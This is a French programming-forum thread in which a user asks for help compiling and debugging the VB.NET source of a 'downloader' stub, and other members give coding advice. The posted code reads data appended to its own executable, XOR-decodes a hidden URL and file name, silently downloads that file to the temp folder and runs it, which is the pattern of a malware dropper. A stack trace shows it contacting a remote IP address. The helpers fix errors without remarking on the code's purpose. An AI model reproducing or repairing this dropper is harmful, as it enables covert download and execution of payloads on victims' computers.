Aide erreur code source

spartiate8686 Messages postés 5 Date d'inscription vendredi 17 février 2012 Statut Membre Dernière intervention 16 août 2012 - 17 févr. 2012 à 23:47
 Utilisateur anonyme - 18 févr. 2012 à 16:30
bonjour a tous,

je ne sait pas si je suis au bonne endroits pour poser cette question si se net pas le cas pouvez-vous m'indiquer ou merci

voila j'ai récupéré le code source d'un downloader,quand je l'ouvre avec visual basic 2008 expresse il me donne cette erreur pouvez-vous me conseiller ?
je peu poster le code source si il le faut

Avertissement 1 La variable 't1' est utilisée avant qu'une valeur ne lui ait été assignée. Une exception de référence nul peut se produire au moment de l'exécution.

je vous remercie d'avance

10 réponses

NHenry Messages postés 15113 Date d'inscription vendredi 14 mars 2003 Statut Modérateur Dernière intervention 22 avril 2024 159
18 févr. 2012 à 00:09
Bonjour,

Ce n'est pas une erreur, mais un avertissement.
Il indique juste que la variable est utilisée alors que sa valeur peut être incorrecte.

Quel est le code autour de cet avertissement ?

---------------------------------------------------------------------
[list=ordered][*]Pour poser correctement une question et optimiser vos chances d'obtenir des réponses, pensez à lire le règlement CS, ce lien ou encore celui-ci[*]Quand vous postez un code, merci d'utiliser la coloration syntaxique (3ième icône en partant de la droite : )
[*]Si votre problème est résolu (et uniquement si c'est le cas), pensez à mettre "Réponse acceptée" sur le ou les messages qui vous ont aidés./list
---
Mon site
0
spartiate8686 Messages postés 5 Date d'inscription vendredi 17 février 2012 Statut Membre Dernière intervention 16 août 2012
18 févr. 2012 à 14:11
bonjour NHenry

merci pour la réponse rapide
mais une foi compiler cella peut empêcher le bon fonctionnement du programme ?
voici le code:

Imports System.IO
Public Class Form1    
Dim tempPath As String = System.IO.Path.GetTempPath
    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Const FileSplit = "@72389@"
        Dim text1, text2, t1, t2 As String
        Dim II() As String
        FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
        text1 = Space(LOF(1))
        text2 = Space(LOF(1))
        FileGet(1, text1)
        FileGet(1, text2)
        FileClose(1)
        II = Split(text1, FileSplit)
        Dim i As Short
        Dim KeyChar As Integer
        KeyChar = Asc("++")
        For i = 1 To Len(II(1))
            t1 &= Chr(KeyChar Xor Asc(Mid(II(1), i, 1)))
        Next
        For i = 1 To Len(II(2))
            t2 &= Chr(KeyChar Xor Asc(Mid(II(2), i, 1)))
        Next
        If System.IO.File.Exists(tempPath + t2) = True Then
            System.IO.File.Delete(tempPath + t2)
        End If
        My.Computer.Network.DownloadFile(t1, tempPath + t2)
        'System.Threading.Thread.Sleep(3000)
        System.Diagnostics.Process.Start(tempPath + t2)
        Me.Close()
    End Sub
End Class


merci
0
spartiate8686 Messages postés 5 Date d'inscription vendredi 17 février 2012 Statut Membre Dernière intervention 16 août 2012
18 févr. 2012 à 14:33
j'ai une question et il possible d'utiliser net framework 2 sur visual basic 2008 expresse
afin que le programme fonctionne sans avoir a téléchargé net framework 3, 3.5, 4
merci d'avance
0
Utilisateur anonyme
18 févr. 2012 à 14:40
Bonjour,

La variable 't1' est utilisée avant qu'une valeur ne lui ait été assignée

C'est bien expliqué, il s'agit de la valeur de la variable.

Attribue lui donc une valeur, exemple:
        Dim text1 As String = ""
        Dim text2 As String = ""
        Dim t1 As String = ""
        Dim t2 As String = ""


Cordialement


CF2i - Guadeloupe
Ingénierie Informatique
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
spartiate8686 Messages postés 5 Date d'inscription vendredi 17 février 2012 Statut Membre Dernière intervention 16 août 2012
18 févr. 2012 à 15:15
merci beaucoup
j'ai un autre problème une foie compiler j'ai un erreur quand je teste le programme :
Microsoft net framework

Consultez la fin de ce message pour plus de détails sur l'appel du débogage
juste-à-temps (JIT) à la place de cette boîte de dialogue.

************** Texte de l'exception **************
System.Net.WebException: Impossible de se connecter au serveur distant ---> System.Net.Sockets.SocketException: Une tentative de connexion a échoué car le parti connecté n'a pas répondu convenablement au-delà d'une certaine durée ou une connexion établie a échoué car l'hôte de connexion n'a pas répondu 46.105.96.117:80
à System.Net.Sockets.Socket.DoConnect(EndPoint endPointSnapshot, SocketAddress socketAddress)
à System.Net.Sockets.Socket.InternalConnect(EndPoint remoteEP)
à System.Net.ServicePoint.ConnectSocketInternal(Boolean connectFailure, Socket s4, Socket s6, Socket& socket, IPAddress& address, ConnectSocketState state, IAsyncResult asyncResult, Int32 timeout, Exception& exception)
--- Fin de la trace de la pile d'exception interne ---
à System.Net.WebClient.DownloadFile(Uri address, String fileName)
à Microsoft.VisualBasic.MyServices.Internal.WebClientCopy.DownloadFile(Uri address, String destinationFileName)
à Microsoft.VisualBasic.Devices.Network.DownloadFile(Uri address, String destinationFileName, ICredentials networkCredentials, Boolean showUI, Int32 connectionTimeout, Boolean overwrite, UICancelOption onUserCancel)
à Microsoft.VisualBasic.Devices.Network.DownloadFile(String address, String destinationFileName, String userName, String password, Boolean showUI, Int32 connectionTimeout, Boolean overwrite, UICancelOption onUserCancel)
à Microsoft.VisualBasic.Devices.Network.DownloadFile(String address, String destinationFileName, String userName, String password, Boolean showUI, Int32 connectionTimeout, Boolean overwrite)
à Microsoft.VisualBasic.Devices.Network.DownloadFile(String address, String destinationFileName)
à _72389_downloader_stub.Form1.Form1_Load(Object sender, EventArgs e)
à System.EventHandler.Invoke(Object sender, EventArgs e)
à System.Windows.Forms.Form.OnLoad(EventArgs e)
à System.Windows.Forms.Form.OnCreateControl()
à System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible)
à System.Windows.Forms.Control.CreateControl()
à System.Windows.Forms.Control.WmShowWindow(Message& m)
à System.Windows.Forms.Control.WndProc(Message& m)
à System.Windows.Forms.ScrollableControl.WndProc(Message& m)
à System.Windows.Forms.ContainerControl.WndProc(Message& m)
à System.Windows.Forms.Form.WmShowWindow(Message& m)
à System.Windows.Forms.Form.WndProc(Message& m)
à System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
à System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
à System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)


************** Assemblys chargés **************
mscorlib
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.3623 (GDR.050727-3600)
CodeBase : file:///C:/WINDOWS/Microsoft.NET/Framework/v2.0.50727/mscorlib.dll
----------------------------------------
mscorlib.resources
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.3623 (GDR.050727-3600)
CodeBase : file:///C:/WINDOWS/Microsoft.NET/Framework/v2.0.50727/mscorlib.dll
----------------------------------------
Stub
Version de l'assembly : 1.0.0.0
Version Win32 : 1.0.0.0
CodeBase : file:///C:/Documents%20and%20Settings/Administrateur/Bureau/source%20vbnet/72389%20Downloader/Server.exe
----------------------------------------
Microsoft.VisualBasic
Version de l'assembly : 8.0.0.0
Version Win32 : 8.0.50727.3053 (netfxsp.050727-3000)
CodeBase : file:///C:/WINDOWS/assembly/GAC_MSIL/Microsoft.VisualBasic/8.0.0.0__b03f5f7f11d50a3a/Microsoft.VisualBasic.dll
----------------------------------------
System
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.3624 (GDR.050727-3600)
CodeBase : file:///C:/WINDOWS/assembly/GAC_MSIL/System/2.0.0.0__b77a5c561934e089/System.dll
----------------------------------------
System.Windows.Forms
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.3623 (GDR.050727-3600)
CodeBase : file:///C:/WINDOWS/assembly/GAC_MSIL/System.Windows.Forms/2.0.0.0__b77a5c561934e089/System.Windows.Forms.dll
----------------------------------------
System.Drawing
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.3053 (netfxsp.050727-3000)
CodeBase : file:///C:/WINDOWS/assembly/GAC_MSIL/System.Drawing/2.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll
----------------------------------------
System.Runtime.Remoting
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.3053 (netfxsp.050727-3000)
CodeBase : file:///C:/WINDOWS/assembly/GAC_MSIL/System.Runtime.Remoting/2.0.0.0__b77a5c561934e089/System.Runtime.Remoting.dll
----------------------------------------
System.Configuration
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.3053 (netfxsp.050727-3000)
CodeBase : file:///C:/WINDOWS/assembly/GAC_MSIL/System.Configuration/2.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll
----------------------------------------
System.Xml
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.3082 (QFE.050727-3000)
CodeBase : file:///C:/WINDOWS/assembly/GAC_MSIL/System.Xml/2.0.0.0__b77a5c561934e089/System.Xml.dll
----------------------------------------
System.resources
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.3053 (netfxsp.050727-3000)
CodeBase : file:///C:/WINDOWS/assembly/GAC_MSIL/System.resources/2.0.0.0_fr_b77a5c561934e089/System.resources.dll
----------------------------------------
System.Windows.Forms.resources
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.3053 (netfxsp.050727-3000)
CodeBase : file:///C:/WINDOWS/assembly/GAC_MSIL/System.Windows.Forms.resources/2.0.0.0_fr_b77a5c561934e089/System.Windows.Forms.resources.dll
----------------------------------------

************** Débogage JIT **************
Pour activer le débogage juste-à-temps (JIT), le fichier de configuration pour cette
application ou cet ordinateur (machine.config) doit avoir la valeur
jitDebugging définie dans la section system.windows.forms.
L'application doit également être compilée avec le débogage
activé.

Par exemple :

<configuration>
<system.windows.forms jitDebugging="true" />
</configuration>

Lorsque le débogage juste-à-temps est activé, les exceptions non gérées
seront envoyées au débogueur JIT inscrit sur l'ordinateur
plutôt que d'être gérées par cette boîte de dialogue.

j'ai exécuter le débogage voila se qu'il me dit exception System.IndexOutOfRangeException
For i = 1 To Len(II(1))

meric
0
NHenry Messages postés 15113 Date d'inscription vendredi 14 mars 2003 Statut Modérateur Dernière intervention 22 avril 2024 159
18 févr. 2012 à 15:19
Bonjour,

Pour commencer à bien coder en .NET :
Actives Option Strict et Option Explicit (propriétés du projet)
Retires l'import automatique de l'espace de nom Microsoft.VisualBasic (onglet Références)

Ensuite, évites FileOpen et utilises plutôt les fluxs System.IO.Stream

---------------------------------------------------------------------
[list=ordered][*]Pour poser correctement une question et optimiser vos chances d'obtenir des réponses, pensez à lire le règlement CS, ce lien ou encore celui-ci[*]Quand vous postez un code, merci d'utiliser la coloration syntaxique (3ième icône en partant de la droite : )
[*]Si votre problème est résolu (et uniquement si c'est le cas), pensez à mettre "Réponse acceptée" sur le ou les messages qui vous ont aidés./list
---
Mon site
0
spartiate8686 Messages postés 5 Date d'inscription vendredi 17 février 2012 Statut Membre Dernière intervention 16 août 2012
18 févr. 2012 à 15:38
merci j'ai suivis tes conseils
maintenant je me retrouve avec plusieurs erreurs dans mon code je pense qu'il faut que j'utilise le système System.IO.Stream
auriez-vous un bon tutoriel sur la manière d'utiliser System.IO.Stream merci
ou alors corriger mon code qui se trouve dans mon message précédent pour voir la fonction System.IO.Stream

encore merci a vous
0
NHenry Messages postés 15113 Date d'inscription vendredi 14 mars 2003 Statut Modérateur Dernière intervention 22 avril 2024 159
18 févr. 2012 à 15:44
Bonjour,

Pour les flux :
http://msdn.microsoft.com/en-us/library/system.io.streamreader.aspx

---------------------------------------------------------------------
[list=ordered][*]Pour poser correctement une question et optimiser vos chances d'obtenir des réponses, pensez à lire le règlement CS, ce lien ou encore celui-ci[*]Quand vous postez un code, merci d'utiliser la coloration syntaxique (3ième icône en partant de la droite : )
[*]Si votre problème est résolu (et uniquement si c'est le cas), pensez à mettre "Réponse acceptée" sur le ou les messages qui vous ont aidés./list
---
Mon site
0
Utilisateur anonyme
18 févr. 2012 à 15:50
Re:
Oui, ou le "ReadAllLines" en français:
DANS CE LIEN


Cordialement


CF2i - Guadeloupe
Ingénierie Informatique
0
Utilisateur anonyme
18 févr. 2012 à 16:30
Je ne comprend pas où est le fichier que tu veux lire, et ce que tu veux faire, d'ailleurs dans ton FileOpen tu ne lui donnes pas le nom du fichier, tu as uniquement le chemin:
        FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)



Cordialement


CF2i - Guadeloupe
Ingénierie Informatique
0
Rejoignez-nous